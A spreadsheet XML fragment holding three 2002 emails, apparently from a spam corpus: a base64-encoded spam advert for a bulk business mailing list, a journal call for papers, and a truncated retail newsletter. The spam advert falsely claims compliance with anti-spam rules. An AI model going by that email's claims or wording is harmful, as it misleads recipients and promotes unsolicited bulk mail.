 Ig0KeG1sbnM6dz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTpvZmZpY2U6d29yZCINCnht
 bG5zPSJodHRwOi8vd3d3LnczLm9yZy9UUi9SRUMtaHRtbDQwIj4NCg0KPGhlYWQ+DQo8bWV0
 YSBodHRwLWVxdWl2PUNvbnRlbnQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9
 d2luZG93cy0xMjUyIj4NCjxtZXRhIG5hbWU9UHJvZ0lkIGNvbnRlbnQ9V29yZC5Eb2N1bWVu
 dD4NCjxtZXRhIG5hbWU9R2VuZXJhdG9yIGNvbnRlbnQ9Ik1pY3Jvc29mdCBXb3JkIDkiPg0K
 PG1ldGEgbmFtZT1PcmlnaW5hdG9yIGNvbnRlbnQ9Ik1pY3Jvc29mdCBXb3JkIDkiPg0KPGxp
 bmsgcmVsPUZpbGUtTGlzdA0KaHJlZj0iLi9UaGUlMjBObyUyMDElMjBCdXNpbmVzc21haWxs
 aXN0JTIwaW4lMjB0aGUlMjBXb3JsZF9maWxlcy9maWxlbGlzdC54bWwiPg0KPHRpdGxlPlRo
 ZSBObyAxIEJ1c2luZXNzbWFpbGxpc3QgaW4gdGhlIFdvcmxkPC90aXRsZT4NCjwhLS1baWYg
 Z3RlIG1zbyA5XT48eG1sPg0KIDxvOkRvY3VtZW50UHJvcGVydGllcz4NCiAgPG86QXV0aG9y
 PlBhdHJpY2sgTWMgQ2FubjwvbzpBdXRob3I+DQogIDxvOlRlbXBsYXRlPk5vcm1hbDwvbzpU
 ZW1wbGF0ZT4NCiAgPG86TGFzdEF1dGhvcj5QYXRyaWNrIE1jIENhbm48L286TGFzdEF1dGhv
 cj4NCiAgPG86UmV2aXNpb24+MjwvbzpSZXZpc2lvbj4NCiAgPG86VG90YWxUaW1lPjIxPC9v
 OlRvdGFsVGltZT4NCiAgPG86Q3JlYXRlZD4yMDAyLTA3LTE4VDE2OjEyOjAwWjwvbzpDcmVh
 dGVkPg0KICA8bzpMYXN0U2F2ZWQ+MjAwMi0wNy0xOFQxNjoxMjowMFo8L286TGFzdFNhdmVk
 Pg0KICA8bzpQYWdlcz4xPC9vOlBhZ2VzPg0KICA8bzpXb3Jkcz4xNTQ8L286V29yZHM+DQog
 IDxvOkNoYXJhY3RlcnM+ODc5PC9vOkNoYXJhY3RlcnM+DQogIDxvOkNvbXBhbnk+MjFzdG5l
 dHdvcms8L286Q29tcGFueT4NCiAgPG86TGluZXM+NzwvbzpMaW5lcz4NCiAgPG86UGFyYWdy
 YXBocz4xPC9vOlBhcmFncmFwaHM+DQogIDxvOkNoYXJhY3RlcnNXaXRoU3BhY2VzPjEwNzk8
 L286Q2hhcmFjdGVyc1dpdGhTcGFjZXM+DQogIDxvOlZlcnNpb24+OS4yNzIwPC9vOlZlcnNp
 b24+DQogPC9vOkRvY3VtZW50UHJvcGVydGllcz4NCjwveG1sPjwhW2VuZGlmXS0tPg0KPHN0
 eWxlPg0KPCEtLQ0KIC8qIFN0eWxlIERlZmluaXRpb25zICovDQpwLk1zb05vcm1hbCwgbGku
 TXNvTm9ybWFsLCBkaXYuTXNvTm9ybWFsDQoJe21zby1zdHlsZS1wYXJlbnQ6IiI7DQoJbWFy
 Z2luOjBjbTsNCgltYXJnaW4tYm90dG9tOi4wMDAxcHQ7DQoJbXNvLXBhZ2luYXRpb246d2lk
 b3ctb3JwaGFuOw0KCWZvbnQtc2l6ZToxMi4wcHQ7DQoJZm9udC1mYW1pbHk6IlRpbWVzIE5l
 dyBSb21hbiI7DQoJbXNvLWZhcmVhc3QtZm9udC1mYW1pbHk6IlRpbWVzIE5ldyBSb21hbiI7
 fQ0KaDENCgl7bXNvLXN0eWxlLW5leHQ6Tm9ybWFsOw0KCW1hcmdpbjowY207DQoJbWFyZ2lu
 LWJvdHRvbTouMDAwMXB0Ow0KCXRleHQtYWxpZ246Y2VudGVyOw0KCW1zby1wYWdpbmF0aW9u
 OndpZG93LW9ycGhhbjsNCglwYWdlLWJyZWFrLWFmdGVyOmF2b2lkOw0KCW1zby1vdXRsaW5l
 LWxldmVsOjE7DQoJZm9udC1zaXplOjEyLjBwdDsNCglmb250LWZhbWlseToiVGltZXMgTmV3
 IFJvbWFuIjsNCgljb2xvcjpibHVlOw0KCW1zby1mb250LWtlcm5pbmc6MHB0O30NCnAuTXNv
 VGl0bGUsIGxpLk1zb1RpdGxlLCBkaXYuTXNvVGl0bGUNCgl7bWFyZ2luOjBjbTsNCgltYXJn
 aW4tYm90dG9tOi4wMDAxcHQ7DQoJdGV4dC1hbGlnbjpjZW50ZXI7DQoJbXNvLXBhZ2luYXRp
 b246d2lkb3ctb3JwaGFuOw0KCWZvbnQtc2l6ZToyMC4wcHQ7DQoJbXNvLWJpZGktZm9udC1z
 aXplOjEyLjBwdDsNCglmb250LWZhbWlseToiVGltZXMgTmV3IFJvbWFuIjsNCgltc28tZmFy
 ZWFzdC1mb250LWZhbWlseToiVGltZXMgTmV3IFJvbWFuIjsNCgljb2xvcjpyZWQ7fQ0KcC5N
 c29Cb2R5VGV4dCwgbGkuTXNvQm9keVRleHQsIGRpdi5Nc29Cb2R5VGV4dA0KCXttYXJnaW46
 MGNtOw0KCW1hcmdpbi1ib3R0b206LjAwMDFwdDsNCgltc28tcGFnaW5hdGlvbjp3aWRvdy1v
 cnBoYW47DQoJZm9udC1zaXplOjEyLjBwdDsNCglmb250LWZhbWlseToiVGltZXMgTmV3IFJv
 bWFuIjsNCgltc28tZmFyZWFzdC1mb250LWZhbWlseToiVGltZXMgTmV3IFJvbWFuIjsNCglj
 b2xvcjojMzM2NkZGO30NCnAuTXNvQm9keVRleHQyLCBsaS5Nc29Cb2R5VGV4dDIsIGRpdi5N
 c29Cb2R5VGV4dDINCgl7bWFyZ2luOjBjbTsNCgltYXJnaW4tYm90dG9tOi4wMDAxcHQ7DQoJ
 dGV4dC1hbGlnbjpjZW50ZXI7DQoJbXNvLXBhZ2luYXRpb246d2lkb3ctb3JwaGFuOw0KCWZv
 bnQtc2l6ZToxOC4wcHQ7DQoJbXNvLWJpZGktZm9udC1zaXplOjEyLjBwdDsNCglmb250LWZh
 bWlseToiVGltZXMgTmV3IFJvbWFuIjsNCgltc28tZmFyZWFzdC1mb250LWZhbWlseToiVGlt
 ZXMgTmV3IFJvbWFuIjsNCgljb2xvcjpibHVlOw0KCWZvbnQtd2VpZ2h0OmJvbGQ7DQoJZm9u
 dC1zdHlsZTppdGFsaWM7fQ0KYTpsaW5rLCBzcGFuLk1zb0h5cGVybGluaw0KCXtjb2xvcjpi
 bHVlOw0KCXRleHQtZGVjb3JhdGlvbjp1bmRlcmxpbmU7DQoJdGV4dC11bmRlcmxpbmU6c2lu
 Z2xlO30NCmE6dmlzaXRlZCwgc3Bhbi5Nc29IeXBlcmxpbmtGb2xsb3dlZA0KCXtjb2xvcjpw
 dXJwbGU7DQoJdGV4dC1kZWNvcmF0aW9uOnVuZGVybGluZTsNCgl0ZXh0LXVuZGVybGluZTpz
 aW5nbGU7fQ0KQHBhZ2UgU2VjdGlvbjENCgl7c2l6ZTo1OTUuM3B0IDg0MS45cHQ7DQoJbWFy
 Z2luOjcyLjBwdCA5MC4wcHQgNzIuMHB0IDkwLjBwdDsNCgltc28taGVhZGVyLW1hcmdpbjoz
 NS40cHQ7DQoJbXNvLWZvb3Rlci1tYXJnaW46MzUuNHB0Ow0KCW1zby1wYXBlci1zb3VyY2U6
 MDt9DQpkaXYuU2VjdGlvbjENCgl7cGFnZTpTZWN0aW9uMTt9DQotLT4NCjwvc3R5bGU+DQo8
 L2hlYWQ+DQoNCjxib2R5IGxhbmc9RU4tR0IgbGluaz1ibHVlIHZsaW5rPXB1cnBsZSBzdHls
 ZT0ndGFiLWludGVydmFsOjM2LjBwdCc+DQoNCjxkaXYgY2xhc3M9U2VjdGlvbjE+DQoNCjxw
 IGNsYXNzPU1zb1RpdGxlPjxzcGFuIHN0eWxlPSdjb2xvcjpibGFjayc+PCFbaWYgIXN1cHBv
 cnRFbXB0eVBhcmFzXT4mbmJzcDs8IVtlbmRpZl0+PG86cD48L286cD48L3NwYW4+PC9wPg0K
 DQo8cCBjbGFzcz1Nc29UaXRsZT48c3BhbiBzdHlsZT0nY29sb3I6YmxhY2snPjwhW2lmICFz
 dXBwb3J0RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9vOnA+PC9zcGFuPjwv
 cD4NCg0KPHAgY2xhc3M9TXNvVGl0bGU+PGI+PHNwYW4gc3R5bGU9J2NvbG9yOmJsYWNrJz5U
 aGUgTm8gMSBCdXNpbmVzc21haWxsaXN0IGluIHRoZQ0KV29ybGQ8bzpwPjwvbzpwPjwvc3Bh
 bj48L2I+PC9wPg0KDQo8cCBjbGFzcz1Nc29UaXRsZT48c3BhbiBzdHlsZT0nY29sb3I6Ymxh
 Y2snPjwhW2lmICFzdXBwb3J0RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9v
 OnA+PC9zcGFuPjwvcD4NCg0KPHAgY2xhc3M9TXNvVGl0bGU+PGI+PGk+PHU+U3BhbSBpcyBh
 IFNlcmlvdXMgT2ZmZW5jZTxvOnA+PC9vOnA+PC91PjwvaT48L2I+PC9wPg0KDQo8cCBjbGFz
 cz1Nc29Ob3JtYWwgYWxpZ249Y2VudGVyIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcic+PHNw
 YW4NCnN0eWxlPSdmb250LXNpemU6MjAuMHB0O21zby1iaWRpLWZvbnQtc2l6ZToxMi4wcHQ7
 Y29sb3I6cmVkJz48IVtpZiAhc3VwcG9ydEVtcHR5UGFyYXNdPiZuYnNwOzwhW2VuZGlmXT48
 bzpwPjwvbzpwPjwvc3Bhbj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBhbGlnbj1jZW50
 ZXIgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyJz48aT48c3Bhbg0Kc3R5bGU9J2ZvbnQtc2l6
 ZToxOC4wcHQ7bXNvLWJpZGktZm9udC1zaXplOjEyLjBwdDtjb2xvcjpibGFjayc+V2FudCB0
 byBleHBvc2UNCnlvdXIgPG86cD48L286cD48L3NwYW4+PC9pPjwvcD4NCg0KPHAgY2xhc3M9
 TXNvTm9ybWFsIGFsaWduPWNlbnRlciBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXInPjxpPjxz
 cGFuDQpzdHlsZT0nZm9udC1zaXplOjE4LjBwdDttc28tYmlkaS1mb250LXNpemU6MTIuMHB0
 O2NvbG9yOmJsYWNrJz5Ib21lIEJhc2VkDQpCdXNpbmVzcyB0byAxMDAwknMgcGVyIGRheS48
 bzpwPjwvbzpwPjwvc3Bhbj48L2k+PC9wPg0KDQo8cCBjbGFzcz1Nc29Ob3JtYWwgYWxpZ249
 Y2VudGVyIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcic+PHNwYW4NCnN0eWxlPSdmb250LXNp
 emU6MTguMHB0O21zby1iaWRpLWZvbnQtc2l6ZToxMi4wcHQ7Y29sb3I6YmxhY2snPjwhW2lm
 ICFzdXBwb3J0RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9vOnA+PC9zcGFu
 PjwvcD4NCg0KPHAgY2xhc3M9TXNvTm9ybWFsIGFsaWduPWNlbnRlciBzdHlsZT0ndGV4dC1h
 bGlnbjpjZW50ZXInPjxzcGFuDQpzdHlsZT0nZm9udC1zaXplOjE4LjBwdDttc28tYmlkaS1m
 b250LXNpemU6MTIuMHB0O2NvbG9yOmJsYWNrJz48c3Bhbg0Kc3R5bGU9Im1zby1zcGFjZXJ1
 bjogeWVzIj6gPC9zcGFuPio8c3BhbiBzdHlsZT0ibXNvLXNwYWNlcnVuOiB5ZXMiPqANCjwv
 c3Bhbj5TcGFtIEZyZWU8c3BhbiBzdHlsZT0ibXNvLXNwYWNlcnVuOiB5ZXMiPqAgPC9zcGFu
 Pio8bzpwPjwvbzpwPjwvc3Bhbj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBhbGlnbj1j
 ZW50ZXIgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyJz48c3Bhbg0Kc3R5bGU9J2NvbG9yOmJs
 dWUnPjwhW2lmICFzdXBwb3J0RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9v
 OnA+PC9zcGFuPjwvcD4NCg0KPGgxPlNwZWNpYWwgb2ZmZXIgZm9yIHRoZSBtb250aCBvZiBK
 dWx5IDAyPC9oMT4NCg0KPHAgY2xhc3M9TXNvTm9ybWFsIGFsaWduPWNlbnRlciBzdHlsZT0n
 dGV4dC1hbGlnbjpjZW50ZXInPjxzcGFuDQpzdHlsZT0nY29sb3I6Ymx1ZSc+PCFbaWYgIXN1
 cHBvcnRFbXB0eVBhcmFzXT4mbmJzcDs8IVtlbmRpZl0+PG86cD48L286cD48L3NwYW4+PC9w
 Pg0KDQo8cCBjbGFzcz1Nc29Cb2R5VGV4dDI+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZCc+NiBN
 b250aCBNZW1iZXJzaGlwICsgRnJlZSBBbnRpIJYNClZpcnVzIFNvZnR3YXJlIG9ubHkgJDI0
 Ljk1PG86cD48L286cD48L3NwYW4+PC9wPg0KDQo8cCBjbGFzcz1Nc29Ob3JtYWwgYWxpZ249
 Y2VudGVyIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcic+PHNwYW4NCnN0eWxlPSdjb2xvcjpi
 bHVlJz48IVtpZiAhc3VwcG9ydEVtcHR5UGFyYXNdPiZuYnNwOzwhW2VuZGlmXT48bzpwPjwv
 bzpwPjwvc3Bhbj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBhbGlnbj1jZW50ZXIgc3R5
 bGU9J3RleHQtYWxpZ246Y2VudGVyJz48c3Bhbg0Kc3R5bGU9J2NvbG9yOmJsdWUnPlRoaXMg
 b2ZmZXIgZW5kcyBKdWx5LjxvOnA+PC9vOnA+PC9zcGFuPjwvcD4NCg0KPHAgY2xhc3M9TXNv
 Tm9ybWFsIGFsaWduPWNlbnRlciBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXInPjxzcGFuDQpz
 dHlsZT0nY29sb3I6Ymx1ZSc+PCFbaWYgIXN1cHBvcnRFbXB0eVBhcmFzXT4mbmJzcDs8IVtl
 bmRpZl0+PG86cD48L286cD48L3NwYW4+PC9wPg0KDQo8cCBjbGFzcz1Nc29Ob3JtYWwgYWxp
 Z249Y2VudGVyIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcic+PHNwYW4NCnN0eWxlPSdjb2xv
 cjpibHVlJz5WaXNpdCBvdXIgc2l0ZSBub3cgc2VlIHdoYXQgd2UgY2FuIG9mZmVyIHlvdS48
 bzpwPjwvbzpwPjwvc3Bhbj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBhbGlnbj1jZW50
 ZXIgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyJz48c3Bhbg0Kc3R5bGU9J2NvbG9yOmJsdWUn
 PjwhW2lmICFzdXBwb3J0RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9vOnA+
 PC9zcGFuPjwvcD4NCg0KPHAgY2xhc3M9TXNvTm9ybWFsIGFsaWduPWNlbnRlciBzdHlsZT0n
 dGV4dC1hbGlnbjpjZW50ZXInPjxzcGFuDQpzdHlsZT0nZm9udC1zaXplOjIwLjBwdDttc28t
 YmlkaS1mb250LXNpemU6MTIuMHB0O2NvbG9yOnJlZCc+PGENCmhyZWY9Imh0dHA6Ly93d3cu
 YnVzaW5lc3NtYWlsbGlzdC5jb20vIj48c3BhbiBzdHlsZT0nY29sb3I6cmVkJz5odHRwOi8v
 d3d3LmJ1c2luZXNzbWFpbGxpc3QuY29tLzwvc3Bhbj48L2E+DQo8bzpwPjwvbzpwPjwvc3Bh
 bj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBhbGlnbj1jZW50ZXIgc3R5bGU9J3RleHQt
 YWxpZ246Y2VudGVyJz48c3Bhbg0Kc3R5bGU9J2NvbG9yOmJsdWUnPjwhW2lmICFzdXBwb3J0
 RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9vOnA+PC9zcGFuPjwvcD4NCg0K
 PHAgY2xhc3M9TXNvTm9ybWFsIHN0eWxlPSd0ZXh0LWFsaWduOmp1c3RpZnknPioqKioqKioq
 KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
 KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqPHNwYW4NCnN0eWxlPSdmb250LXNp
 emU6MTAuMHB0O2ZvbnQtZmFtaWx5OkFyaWFsO21zby1iaWRpLWZvbnQtZmFtaWx5OiJUaW1l
 cyBOZXcgUm9tYW4iOw0KbGV0dGVyLXNwYWNpbmc6LS4yNXB0Jz48bzpwPjwvbzpwPjwvc3Bh
 bj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBzdHlsZT0ndGV4dC1hbGlnbjpqdXN0aWZ5
 Jz5UaGlzIGUtbWFpbCBpcyBzZW50IHRvIHlvdSBpbg0KY29tcGxpYW5jZSB3aXRoIHN0cmlj
 dCBhbnRpLWFidXNlIGFuZCBubyBzcGFtIHJlZ3VsYXRpb25zLCBhbmQgaGFzIGEgcmVtb3Zl
 DQptZWNoYW5pc20gYnVpbHQgaW4gZm9yIHJlbW92aW5nIHlvdXJzZWxmIGZyb20gb3VyIG1h
 aWxpbmcgZGF0YSBiYXNlLiBZb3VyDQplLW1haWwgd2FzIG9idGFpbmVkIGFzIGEgcmVzdWx0
 IG9mIHBvc3RpbmcgdG8gbGlua3MsIGNsYXNzaWZpZWQgYWR2ZXJ0cywgb3B0LWluDQptYWls
 aW5nIGxpc3RzIG9yIHlvdSBoYXZlIGUtbWFpbGVkIHVzIGluIHRoZSBwYXN0LlRvIHJlbW92
 ZSB5b3VyIGUtbWFpbCBzaW1wbHkNCnJlcGx5IHdpdGggPGEgaHJlZj0ibWFpbHRvOnN5c3Rl
 bXhAdXR2aW50ZXJuZXQuY29tP3N1YmplY3Q9cmVtb3ZlIj5yZW1vdmU8L2E+DQppbiB0aGUg
 c3ViamVjdCBsaW5lLjxzcGFuIHN0eWxlPSJtc28tc3BhY2VydW46DQp5ZXMiPqCgoKCgoKCg
 oKCgoKCgoKCgoKCgoKCgoKCgoKCgoKANCjwvc3Bhbj4qKioqKioqKioqKioqKioqKioqKioq
 KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
 KioqKioqKioqKioqKioqKio8L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBhbGlnbj1jZW50
 ZXIgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyJz48c3Bhbg0Kc3R5bGU9J2NvbG9yOmJsdWUn
 PjwhW2lmICFzdXBwb3J0RW1wdHlQYXJhc10+Jm5ic3A7PCFbZW5kaWZdPjxvOnA+PC9vOnA+
 PC9zcGFuPjwvcD4NCg0KPHAgY2xhc3M9TXNvTm9ybWFsIGFsaWduPWNlbnRlciBzdHlsZT0n
 dGV4dC1hbGlnbjpjZW50ZXInPjxzcGFuDQpzdHlsZT0nY29sb3I6cmVkJz48IVtpZiAhc3Vw
 cG9ydEVtcHR5UGFyYXNdPiZuYnNwOzwhW2VuZGlmXT48bzpwPjwvbzpwPjwvc3Bhbj48L3A+
 DQoNCjwvZGl2Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4NCiAgICA=
 ------=_NextPart_000_001D_53B46E59.C27024C0--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Priority: normal
 Date:         Mon, 9 Sep 2002 08:56:49 +0000
 Reply-To:     Law &amp; Policy of Computer Communications
 &lt;CYBERIA-L@LISTSERV.AOL.COM&gt;
 Sender:       Law &amp; Policy of Computer Communications
 &lt;CYBERIA-L@LISTSERV.AOL.COM&gt;
 Comments:     Authenticated sender is jakobs@i4mail.informatik.rwth-aachen.de
 From:         Kai Jakobs &lt;Kai.Jakobs@I4.INFORMATIK.RWTH-AACHEN.DE&gt;
 Subject: [CYBERIA] [Final CfP]: Int. J. on IT Standards Research
 To:           CYBERIA-L@LISTSERV.AOL.COM
 Hello,
 Just a brief reminder that the deadline for submisisons for issue 2
 of the
 'International Journal of IT Standards &amp; Standardization Research' (JITSR)
 is October 1.
 JITSR is a  new, multi-disciplinary publication outlet for everyone who
 is doing research into IT standards and standardisation (from whichever
 perspective).
 So if you think you've got a paper that might fit - why not submit
 it for JITSR?
 And please do ask if you need any further information.
 Greetings from Aachen.
 Cheers,
 Kai.
 -----------------------------
 Call for Papers
 for Issue 2 of the
 International Journal of
 IT Standards &amp; Standardization Research
 This new journal aims to be a platform for presenting, and
 discussing, the broad variety of aspects that make up IT standards
 research. This includes, but is certainly not limited to,
 contributions from the disciplines of computer science, information
 systems, management, business, social sciences (especially science
 and technology studies), economics, engineering, political science,
 public policy, sociology, communication, and human factors/
 usability. In particular, the journal wants to both support and
 promote multi-disciplinary research on IT standards; 'IT'
 should be understood in a very broad sense.
 Topics to be covered include, but are not limited to:
  - Technological innovation and standardisation
  - Standards for information infrastructures
  - Standardisation and economic development
  - Open Source and standardisation
  - Intellectual property rights
  - Economics of standardisation
  - Emerging roles of formal standards organisations and consortia
  - Conformity assessment
  - National, regional, international and corporate standards
    strategies
  - Standardisation and regulation
  - Standardisation as a form of the Public Sphere
  - Standardisation and public policy formation
  - Analyses of standards setting processes, products, and
    organisation
  - Case studies of standardisation
  - Impacts of market-driven standardisation and emerging players
  - The future of standardisation
  - Multinational and transnational perspectives and impacts
  - Commercial value of proprietary specifications
  - Descriptive &amp; prescriptive theories of standardisation
  - Standards research and education activities
  - Tools and services supporting improved standardisation
  - User related issues
  - Risks of standardisation
  - Management of standards
  - History of Standards
  - Standards and technology transfer
 Authors are requested to submit their manuscripts as an e-mail
 attachment in RTF or PDF to the editor-in-chief at
 Kai.Jakobs@i4.informatik.rwth-aachen.de.
 If this form of submission is not possible, please send one hardcopy
 of the manuscript together with a disk containing the electronic
 version of the manuscript in RTF or PDF to:
 Kai Jakobs,
 Technical University of Aachen, Computer Science Department,
 Informatik IV
 Ahornstr. 55, D-52074 Aachen, Germany.
 Manuscripts must be written in English on letter-size or A4 paper,
 one side only, double-spaced throughout, and include at least 1"
 (2.54 cm) of margin on all sides. The cover page should contain the
 paper title, and the name, affiliation, address, phone number, fax
 number, and e-mail address of each author. The second page should
 start with the paper title at the top and be immediately followed by
 the abstract. Except on the cover page, the authors' names and
 affiliations must NOT appear in the manuscript. The abstract of 100-
 150 words should clearly summarise the objectives and content of the
 manuscript. Submitted manuscript should normally be 4000-6000 words
 long; longer ones will be considered but may be subject to editorial
 revision.
 Submission of a paper implies that its content is original and that
 it has not been published previously, and that it is not under
 consideration for publication elsewhere. Yet, significantly extended
 papers previously presented at conferences may be acceptable.
 For more information please see
 http://www-i4.informatik.rwth-aachen.de/~jakobs/standards_journal/journal_home.html
 or visit the publisher's web site at
 http://www.idea-group.com/journals/details.asp?id=497
 Important Dates for the Inaugural Issue:
 Submission Deadline for Issue 2:   October 1, 2002
 Notification of Acceptance:        December 1, 2002
 Camera-ready Paper Due:            January 15, 2003
 ________________________________________________________________
 Kai Jakobs
 Technical University of Aachen
 Computer Science Department
 Informatik IV (Communication and Distributed Systems)
 Ahornstr. 55, D-52074 Aachen, Germany
 Tel.: +49-241-80-21405
 Fax:  +49-241-80-22220
 Kai.Jakobs@i4.informatik.rwth-aachen.de
 http://www-i4.informatik.rwth-aachen.de/~jakobs/kai/kai_home.html
 **********************************************************************
 For Listserv Instructions, see http://www.lawlists.net/cyberia
 Off-Topic threads: http://www.lawlists.net/mailman/listinfo/cyberia-ot
 Need more help? Send mail to: Cyberia-L-Request@listserv.aol.com
 **********************************************************************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</si>
  <si>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Back to School with Buy4Now
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_22A2C_01C23F09.09760420
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
  &lt;http://www.buy4now.ie&gt; =20
  	 =09
  	   =20
  	=20
 =20
  =09
 =20
  	It's Back to School at Buy4Now, but don't feel down because we
 have lots of special offers, a great competition and more to cheer you
 up!	  =09
  =09
  	 	 =09
  WIN a =802,000 Online Gift Voucher with Buy4Now!
 &gt;&gt;From August 8th to 29th, find as many apples as you can on the Buy4Now
 partner sites, and enter our draw. Everytime you find an apple, click on
 it to enter your login email address and password. You can enter as many
 times as you want: the more apples you find, the more chances you get.
  =09
  =09
 =20
 =20
 =20
 =20
 Eason school books &amp; academic titles
 &lt;http://www.buy4now.ie/Eason/main_frame.asp?target=3D3&amp;sectionid=3D1&amp;subs=
 ect
 ionid=3D7&gt;=20
 Spend over =8070 and get free delivery!
 Multimedia desk
 &lt;http://www.buy4now.ie/atlanticdiy/viewcategory.asp?CatID=3D46603&amp;StoreID=
 =3D
 1&amp;Level=3D2&amp;type=3D1&gt;=20
 Ideal for the study or home office. =8099=20
 Handheld voice &amp; email unit
 &lt;http://www.buy4now.ie/giftstore/index.asp?p=3D844&amp;portal=3D1&amp;qty=3D1&amp;tar=
 get=3D3
 &gt; . Record a message, store it, then email it! =80350=20
 Music to study by....
 &lt;http://www.buy4now.ie/dmgdirect/main.asp?sectionid=3D3&amp;subsectionid=3D0&amp;=
 tar
 get=3D3&gt;=20
 Great savings with DMGDirect's summer sale.=20
  =09
 =20
 =20
 =20
 =20
 Nike Brazil backpack
 &lt;http://www.buy4now.ie/satelite/catfind.asp?portal=3D1&amp;categoryid=3D201&amp;S=
 tor
 eID=3D1&amp;Level=3D1&amp;type=3D1&gt;=20
 Be sure to be seen with this bright bag...=8026
 Spacey pen.
 &lt;http://www.buy4now.ie/source/shopping/viewwhitebasket.asp?StoreID=3D1&amp;Pr=
 o
 dID=3D3373&amp;type=3D1&gt; Funny and funky, whether you're 7 or 45 yrs old. =
 =807.95=20
 Pack of 2 school shirts
 &lt;http://www.buy4now.ie/arnotts/viewcategory.asp?CatID=3D1141&amp;StoreID=3D1&amp;=
 Lev
 el=3D1&amp;type=3D1&gt;=20
 No more hassle: order your schoolwear from Arnotts.ie
 &lt;http://www.buy4now.ie/arnotts&gt; .=20
 Tape dispenser
 &lt;http://www.buy4now.ie/source/shopping/viewwhitebasket.asp?StoreID=3D1&amp;Pr=
 o
 dID=3D3371&amp;type=3D1&gt;=20
 Add a touch of kitsch to your desk with our flowery dispenser. =809.99
  =09
  	 	 	 	 =09
  =09
  &lt;http://www.buy4now.ie/index.asp?s=3D2&amp;ss=3D0&amp;sc=3DM&gt;  Lord of the =
 Rings DVD
 set &lt;http://www.buy4now.ie/index.asp?s=3D2&amp;ss=3D0&amp;sc=3DM&gt; , from =
 DMGDirect.
 This 2 discs set contains The Fellowship of the Ring, plus lots of extra
 features. RRP =8043.25, Online Price: =8037.99. Buy4Now Members: =
 =8033.99.
 Save =804!	=20
  =09
  	=20
  &lt;http://www.aib.ie/personal&gt; 	 It?s all about choice, convenience and
 control! Register today for AIB?s Internet and Phone Banking service and
 be the master of your finances. With AIB?s Internet and Phone Banking
 service you can pay a wide range of domestic bills including ESB and
 ntl, check the balance of your accounts, transfer funds, view statements
 of your accounts, search for a cheque and much, much more.
 For more information on the range of services that you can do click
 here.
 &lt;http://www.aibgroup.com/servlet/ContentServer?pagename=3DAIB_PersonalPor=
 t
 al/AIB_Services/aib_d_service&amp;c=3DAIB_Services&amp;cid=3D1005066604069&amp;channe=
 l=3DH
 P&gt; To register today click here
 &lt;http://194.69.198.130/servlet/ContentServer?pagename=3DAIB_PersonalPorta=
 l
 /Miscellaneous/24_hour_banking_app_1&amp;c=3DAIB_Application&amp;cid=3D1018955566=
 725
 &amp;channel=3DHP&gt; .=20
 Terms and conditions apply. Allied Irish Banks, p.l.c. is licensed by
 the Central Bank of Ireland.=20
  =09
  =09
 =20
 =20
 =20
 =20
 Nintendo Game Cube.
 &lt;http://www.buy4now.ie/giftstore/index.asp?p=3D736&amp;portal=3D1&amp;qty=3D1&amp;tar=
 get=3D3
 &gt;=20
 Gaming at its very best. =80219.99
 EFX Baby minicooler
 &lt;http://www.buy4now.ie/source/shopping/viewwhitebasket.asp?StoreID=3D1&amp;Pr=
 o
 dID=3D3369&amp;type=3D1&gt;=20
 Keep your cans cool at home or in the office. =80159
 Monsters Inc. DVD
 &lt;http://www.buy4now.ie/dmgdirect/main.asp?target=3D41&amp;prodid=3D80594&gt;=20
 Boo! Pre-order your copy now (released on 07/09).=8029.04
 Philips MP3 player.
 &lt;http://www.buy4now.ie/arnotts/viewcategory.asp?CatID=3D1093&amp;StoreID=3D1&amp;=
 Lev
 el=3D1&amp;type=3D1&gt; Also plays CDs, for music on the go. =80249.99
  =09
  	=20
 Contact Buy4Now on 1890 209 309 (calls charged at a local rate. Lines
 open Mon-Fri 9am-9pm, Sat 9am-6pm) or email us at help@buy4now.ie
 &lt;mailto:help@buy4now.ie&gt; =20
 We're sending this newsletter to you as a registered member of Buy4Now.
 If you would like to change the format you receive this newsletter in,
 click here
 &lt;mailto:newslettercomments@buy4now.ie?subject=3DPlease%20send%20me%20this=
 %
 20newsletter%20in%20TEXT%20format.&gt; . If you no longer want to receive
 the Buy4Now Nnewsletter, simply click here
 &lt;http://www.buy4now.ie/emails/unsubscribe.asp?email=3Dzzz-buy4now@zzzason.o=
 r
